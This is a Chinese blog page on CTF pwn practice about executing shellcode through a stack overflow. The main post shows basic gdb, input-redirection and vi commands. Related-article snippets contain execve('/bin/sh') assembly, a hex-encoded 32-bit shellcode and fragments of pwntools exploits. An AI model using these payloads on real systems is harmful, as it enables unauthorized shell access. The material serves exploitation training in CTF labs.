CTF-PWN练习之执行Shellcode

最新推荐文章于 2025-07-10 08:53:29 发布
原创 最新推荐文章于 2025-07-10 08:53:29 发布 · 3.1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了通过制造溢出修改函数返回地址来执行Shellcode的方法,并演示了如何使用Python生成测试文件及利用vi编辑器修改文件内容的过程。

Shellcode 的执行可以通过制造溢出修改函数的返回地址,转为执行Shellcode

将python文件的输出导入文件test:

python xxx.py > test

在gdb中将test 的内容作为输入并运行程序至断点处:

r < test

将test文件的内容作为xxx程序的输入,执行xxx程序:

./xxx < test

另外,可以利用vi 对文件test进行编辑:

vi test

要修改文件内容,按下i或Insert

保存并退出:

:wq

不保存退出:

:q!


pwn学习】pwn中的简单shellcode
Morphy_Amo的博客
12-20 1495
编写简单的shellcode 在linux32位系统中,最简单的获取shell的方式是通过系统调用execve获得 execve('/bin/sh',0,0); 写成汇编的话如下: global _start _start: xor edx, edx xor ecx, ecx push '/sh' push '/bin' mov ebx, esp mov eax, 0xb int 80h 编译
强网杯2021CTF 强网先锋shellcode侧信道攻击复现
qq_39948058的博客
08-27 1671
前言:由于个别原因这个比赛忘记参加了,所以赛后挑选了一道测信道攻击的题来进行复现,这个题开启了沙盒,采用测信道爆破flag,大概思路:使用retf切换到32位open来进行open('./flag'),retfq再回到64位的write和read就可以了,此题禁用了open所以使用32位的open,如果禁用了write就使用32位的write,同理,具体代码分析,懂汇编就能看懂这里就不赘述了,参考了别的大佬的exp,大概就是这样写的,至于系统调用号可以参考前篇调用号文章 exp: from pwn i
*CTF——shellcode
weixin_34186128的博客
04-28 780
一看题目是利用shellcode解决问题 伪代码: EXP: from pwn import* context(os='linux',arch='amd64',log_level='debug') p = process('./shellcode') shellcode ='s\x00'+ asm(shellcraft.sh()):i,j指针同时指向s,跳出内循环,\x0...
Shellcode练习代码
小发猫
01-16 1599
 #include /*void test(){ // sub esp, 44h int b; int *k=&b; k+=22; (*k) = 88; printf("aaaaaaaaaaaaa %d k = %#0x/n", (*k), k);/* __asm {  mov DWORD PTR [ebp-4], a  mov DWORD PTR [ebp+54h], a }*//* p
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwnshellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
CTF-PWN练习之通用跳转技术
ChuMeng1999的博客
01-06 2493
目录预备知识一、相关实验二、strdup函数三、grep命令实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 一、相关实验 本实验要求您已经认真学习和完成了《CTF PWN练习之绕过返回地址限制》。 二、strdup函数 strdup可以用于复制一个字符串,我们通常使用字符串时会使用strcpy,这要求已经定义好了一个接收缓冲区。而strdup只接受一个参数,也就是要复制的字符串的地址,strdup()会先用malloc()配置与参数字符串相同大小的的空间,然后
跟着CTF-wiki学pwn——ret2shellcode
qq_42882717的博客
07-01 1078
CTF-wiki的注解:ret2shellcode
CTF-PWN方向 栈溢出等基础知识笔记(1)
weixin_51339377的博客
09-21 494
栈顶允许插入和删除 栈底不允许进行操作 栈顶在高地址位置。EAX是RAX的一部分 可以认为是EAX即可。
火种CTF PWN easyshellcode writeup
qq_41743240的博客
04-13 1430
检查一下程序保护机制 没有开启NX,也有RWX可读可写可执行的段 将程序拖入IDA 可以看到gets(&s)这里存在溢出漏洞,会将s字符复制0x64字节给buf2 利用思路: **将shellcode写到&s,再填充A覆盖只EIP填入buf2的地址 **这样执行EIP的时候即是执行buf2里面的shellcode 获取到buf2的地址 exploit如下: #coding:u...
CTF——PWN——栈溢出(3.Easy_ShellCode
qq_45215609的博客
09-18 929
CTF——PWN——栈溢出(3.Easy_ShellCode),bss段上的ret2shellcode
虎符CTF2022 —shellcode
qq_54894802的博客
09-21 511
我们进行动态调试,先准备手动脱壳的,脱的时候发现居然有反调试,准备动态调试将反调试的patch但是发现很难脱,脱了半天还在循环,可能太菜的原因(T _ T)。或者记下这个地址,我们使用IDA的附加调试,将IDA附加到程序上,因为程序运行到了打印字符 了,所以壳肯定是解开了。将程序放入X32DBGz中进行分析,我们按F9运行几次,我们就可以运行到我们的OPE之中了。进入之后,我们进行简单的分析可以发现,这个函数实现的是base64加密。看分析还是比较简单,就是将原本程序里面的两端提示,进行加密的。
CSAWCTF-2018-pwn-shellcode 题解
lifanxin的博客
11-29 1579
Write Up知识点关键字样本运行静态分析程序逻辑求解脚本一些细节:wp_shellcode.py 知识点关键字 栈溢出,shellcode拆分+组装 样本 样本来自2018年CSAWCTFpwn题目shellcode 运行 检查文件,发现有两个可以利用的点:   栈溢出保护未开启;   NX保护未开启,存在RWX段。 $ checksec CSAWCTF-2018-pwn [*] '/home/fanxinli/pwnSample/CSAWCTF-2018/CSAWCTF-2018-pwn'
CTF-PWN-ret2shellcode全解
2301_79326514的博客
09-21 2821
可见字符的shellcode是在什么时候用到的呢,有些程序会对用户输入进行检测,让用户只能输入可见字符的时候,就可以用到这个攻击方法了,原理还是很简单的,利用汇编指令对应的ascll码写出来,所以如果要手写的话是要懂汇编的,如果有需要可以自行学习一下。如果我们要写的时候可以写。可以看到运行过这个函数以后,buf所在的0x4040A0也就变成了可读可写可执行了,所以我们把shellcode写入到buff中就可以进行执行了关于mprotect函数的具体使用我在前面一个文章中已经讲解的很详细了,大家可以去看看。
【PolarCTF】Easy_ShellCode
大方子
07-02 257
然后第二个read读取0x100个字节到buf中,那么我们可以通过溢出buf覆盖返回地址到bss中,实现ret2shellcode攻击。再通过gdb看下,可以看到bss段还是可执行的,那么更加确定就是ret2shellcode。点开main有2个函数,start()则是我们要分析的。没有看到可以利用的后门,以及相关/bin/sh字符。第一个read读取0x100个字节到str中。拖入发现是32位程序,同时有可执行的段。那么我们编写下payload。这里有2个read。
BaseCTF2024 shellcode_level1 WP
最新发布
qq_33348179的博客
07-10 173
注意shellcode前的两个0x90是为了覆盖第一次写入的syscall。所以想到使用syscall:查看syscall占的字节数 刚好是2字节。在读取完两字节后还会把读取的字节进行一次call。只读取了两字节来shellcode。64位 开启了全保护。
pwnshellcode收集
lifanxin的博客
02-25 5671
Write Upshellcode shellcode 这里对pwn中使用到的shellcode做了一个汇总,方便大家参考和使用。 # 32位 短字节shellcode --> 21字节 \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80 # 32位 纯ascii字符shellcode PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0
CTF-PWN-level1(Jarvis oj)[栈上shellcode执行]
SuperGate的博客
02-14 975
checksec发现没有开保护机制,所以我们可以考虑使用shellcode方法pwn掉。 查看vulnerable_function函数内部 发现程序直接给我们了buf的首地址。点进去看之后发现,buf只能存0x88个字符,但是我们可以读入0x100个字符。由于读入的时候字符串会暂时存在栈上,我们可以考虑覆盖return的地址到buf的首地址中,然后在buf首地址开始写入shellcode...
pwn shellcode
doudoudedi
11-03 837
漏洞函数很简单没开任何保护直接写入shellcoe读flag这里只允许open read write exp: from pwn import * import pwnlib context_arch='amd64' #p=process('./bad') p=remote('pwnto.fun',12301) elf=ELF('./bad') buf_addr=0x123000 jmp_rsp...
ctfhub pwn栈溢出shellcode
02-22
### CTFHub PWN 栈溢出 Shellcode 示例及解析 #### 创建可执行二进制文件 为了创建用于栈溢出攻击的Shellcode,通常会先编写汇编代码并将其转换成机器码。此过程可以通过NASM完成: ```bash nasm -f bin shellcode...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值